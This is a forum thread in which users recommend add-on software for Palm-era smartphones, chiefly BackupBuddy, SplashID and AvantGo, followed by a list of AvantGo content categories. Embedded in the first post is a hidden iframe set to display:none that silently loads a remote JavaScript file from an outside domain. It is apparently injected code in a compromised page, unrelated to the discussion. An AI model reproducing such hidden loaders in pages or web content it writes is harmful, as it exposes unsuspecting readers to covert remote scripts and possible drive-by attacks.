+ Reply to Thread

Install necessities.

Just an opinion thread, but SHOULD i put on my phone. there is so much debate, choices. what should i put on my phone i would like to have it as sweet as possible. I really like games and the office stuff is nice as well but i dont want to crash my phone and stuff...<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Must have's (IMHO) include BackupBuddy (I like the free version just fine...) and SplashID (for encryption of all the personal info you'll want to have with you).

That, plus a BART Train time schedule, is all the add-on software I have on my 7135 and it's pretty darn stable and reliable.

First thing is a backup program. Again BackupBuddy is a good choice, free or otherwise.

Then if you do install some offending app, you can get back to working again.

I also love SplashID to secure lots of data. I have a few other apps on mine and no problems.
    Taylor Made Web Sites and Domain Services
    Happy Kyocera 7135 User 2003-2008. Now Treo 800w.

wwk
    Like those above, IMHO, BackupBuddy first... whatever comes after, if it does crash, at least you can restore.

Avantgo

Avantgo while it's still for free. Go to avantgo.com and download the software to your computer then you hotsync. They guide you through the process. Next go and pick out the stuff you want to appear on your palm like CNN, USA today, wall St Journal, weather, NY times, movie times in your area, sports and a lot more.
    Each time you hotsync all the articles are updated. I've been using it for years with my palm devices. Still can believe they give you this much content for free

Here are some of the catagories:

Automotive [12]
    Trends, reviews, industry news, buyer's guides, manufacturers...
    Business/Finance [119]
    Finance, business news, stocks, quotes, charts, portfolios...
    Education [19]
    Dictionaries, references, foreign language, quotations, schools, higher learning...
    Entertainment [186]
    Movies, television, music, nightlife, restaurant reviews, humor, games...
    Health [34]
    Health, fitness, medicine, allergies, industry news...
    Lifestyle [87]
    Astrology, amusements, men's content, women's content, pets, parenting...
    News/Media [176]
    Local, regional, national, international news, commentary...
    Portal [5]
    Yahoo, and other popular portals for news, sports, weather, etc...
    Shopping [20]
    Shopping guides, product comparisons, coupon programs, gift guides...
    Sports [81]
    Sports news, baseball, basketball, golf, football, fantasy leagues...
    Technology [105]
    Internet, software, hardware, reviews, PDAs, games, consumer electronics...
    Travel [113]
    Map directions, flight schedules, airlines, weather, restaurant guides, hotels, vacations...

backup buddy ?

Where do i get the free version.. im on the website and i see trial version... but it expires in 30 days and stuff...

That is the free version . . .

after 30 days if you pay you get the added feature of incremental B/U's

From site:
    BackupBuddyVFS:Free is the free, limited version of BackupBuddyVFS. BackupBuddyVFS:Free enables you to back up all or your organizer’s files to and restore all of your backup data from your organizer’s expansion card. With the free version, you are not able to select individual files for back up or restore, schedule automatic back ups or perform the other advanced features described below and in the BackupBuddyVFS manual.